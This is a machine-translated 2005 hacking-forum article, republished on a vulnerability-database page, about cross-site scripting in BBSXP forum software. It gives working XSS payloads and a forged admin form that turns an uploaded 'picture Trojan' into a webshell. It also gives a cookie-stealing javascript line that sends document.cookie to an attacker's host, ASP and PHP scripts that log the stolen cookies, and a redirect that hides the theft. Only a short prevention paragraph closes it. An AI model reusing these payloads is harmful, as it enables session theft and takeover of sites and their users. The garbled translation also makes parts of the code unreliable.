Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220055903
HistoryDec 29, 2005 - 12:00 a.m.

The site original-hack animation. evanescent water analysis of cross-site attacks-vulnerability warning-the black bar safety net

2005-12-2900:00:00
佚名
www.myhack58.com
4
JSON

Analysis of cross-site attacks
Copyright belongs to the author all reproduced Please note the name of the hacker animation bar disappearing water QQ: 2 7 8 7 4 7 4 6 7
Recently everyone seems to cross-site attacks comparison of interest, so call, even also come along for the ride!~ The following text is the younger brother of the little humble opinion

What to write in the wrong place, also please prawn Treatise on!~

The so-called cross-site vulnerabilities? In fact, this and the now more popularSQL injectionof the principle with the same purpose, is because the programmer in writing the program

Some of the variables did not do a full filter, or not doing any filtering on the user directly to the submitted data is sent to SQL statement execution, thus resulting in a user

The submission of some specially constructed statements are generally with like JAVAScript and other such scripting code, so that the service is executed once it is formed.

The so-called cross-site attacks. In General for human-computer interaction is compared to the high of the program, such as Forum, message Board, such procedures are relatively easy to the presence of cross-site script attacks.

How to tell a program whether there is cross-site vulnerability? The analysis program is the most direct method, such as the recent engage in of a fire BBSXP5. 1 5 cross-site

Vulnerability, because prawns have a detailed description of the coupling it is not described in detail, the simple way in cookies. asp file so the sentence

Response. Cookies(“skins”)=“”&Request(“no”)&""then in the setup. asp.

response. write “<html><head><meta http-equiv=Content-Type content=text/html;charset=gb2312></head>
<link href=images/skins/”&Request. Cookies(“skins”)&“/bbs. css rel=stylesheet><script src=inc/BBSxp. js></script>
<script src=inc/ybb. js></script><script src=images/skins/”&Request. Cookies(“skins”)&“/bbs. js></script>”

We can see that as long as the structure meets a condition of the skin the NO, and then in the closed front A"<"then you can later add our<script script.

For example: http://xxx.xxxx.xxx/cookies.asp?menu=skins&amp;no=4&gt;&lt;script&gt;document. write(‘<IFRAME marginWidth=1 0 0 marginHeight=1 0 0 src="http://www.baidu.com"frameBorder=100width=0scrolling=noheight=0to … gin=“0”></IFRAME>’);</script><script>

This submit we can achieve our cross-site purposes, this is my animation already have the demo.

And with the deep layer of use, we can construct the form and confuse the administrator point of our posts, or Join. For example, we construct http://127.0.0.1/bbsxp/page2. asp? username=<body >

<form action=“http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf” method=“post”>
<input value=“/UploadFile/2005-5/200512365.jpg” name=“yl” >
<input value=“database/haha. asp” name=“bf” >
</body></html>
/UploadFile/2005-5/2 0 0 5 1 2 3 6 5. jpg this is your ASP picture Trojan

So we if we allow the administrator to browse our message, 那么这个脚本就会自动把/UploadFile/2005-5/200512365.jpg

Backup into the database/haha. asp. We also have cute webshell. And why should the administrator browse only effective? Because the server is on is the presence of a cookie and the session mechanism

While the session is actually on the server side tmp directory under a file for each user to store some variables to the session operation is actually the file read and write operations.

seesion is that each user has their own session. Their life cycle is generally a user opens a web browser to shut down and the secondary site connected to the

Some browsers after the end. cookie this is on the user end of the storage mechanism, he needs the user to open the cookie support, so the only management only has the right to put our JPG backup in ASP

Now we use the more common is to steal cookies and then cheat, or the use of social engineering to further invasion such as we constructed the following script code can steal user cookies.

javascript:window. open(‘http://xxx.xxx.xxx/cookies.asp?msg=’+document. cookie)

Wherein http://xxx. xxx. xxx/is everyone to their own web space, cookies. asp is an asp script for collecting

msg back with the parameters, and the parameters we specified in the document. cookie, that is, the access to this attached to the user’s cookie.

cookies. the asp code is:
<%

testfile=Server. MapPath(“hun.txt”)

msg=Request(“msg”)

set fs=server. CreateObject(“scripting. filesystemobject”)

set thisfile=fs. OpenTextFile(testfile,8,True,0)

thisfile. WriteLine(“”&msg& “”)

thisfile. close

set fs = nothing

%>

So all visitors of the cookies are collected in hun. txt this file

However, visitor access to our posts, it will also access to our website, so not revealed the secret? Oh, but as long as we slightly do processing

You can do relatively Real, for example, we add the following code

<script language=vbscript>
window. location. href=“http://xxx.xxx.xxx
</script>

This xxx. xxx. xxx best into you to attack the domain name of the website, the purpose of this is during his visit to our carefully constructed website at the same time. he

Own website, Oh, this is not will be more covert?

This cookies. asp and has a role in the same cookies. php, like, attached to the code as follows:
<? php
$info = getenv(“QUERY_STRING”);
if ($info) {
$fp = fopen(“cookies.txt”,“a”);
fwrite($fp,$info.“\ n”);
fclose($fp);
}
?& gt;
But most of the parts to do the good of the Forum, the filter of the javascript these characters. But still there are ways you can take advantage of,

Can the forum send the patch in the javascript written in ascii code. Like j can be written as”j”

Prevention method, is to filter characters like javascript/<script>/’/;/&/#a, etc.,

Of course, the premise is your web page also to the normal display. Suggest that you do not open some unknown url, you will own the mailbox, forums, QQ and other information in the password provided are not the same,

If once the information or password is stolen, avoid lead to a chain reaction, all information and passwords are to be someone else to get. It is necessary to use to the profound social engineering.

To summarize. Cross-site the tips is very strong, Oh everyone more experience with them will achieve a multiplier effect. This article in many places

Borrow see the domestic cattle of good ideas. Because I limited capacity, can not help but have the wrong place, also Please a lot of advice. Even also take this below

Initiate, I hope there is a master plus a couple from the Exchange, qq:2 7 8 7 4 7 4 6 7 Oh, expect cattle presence!~—~

JSON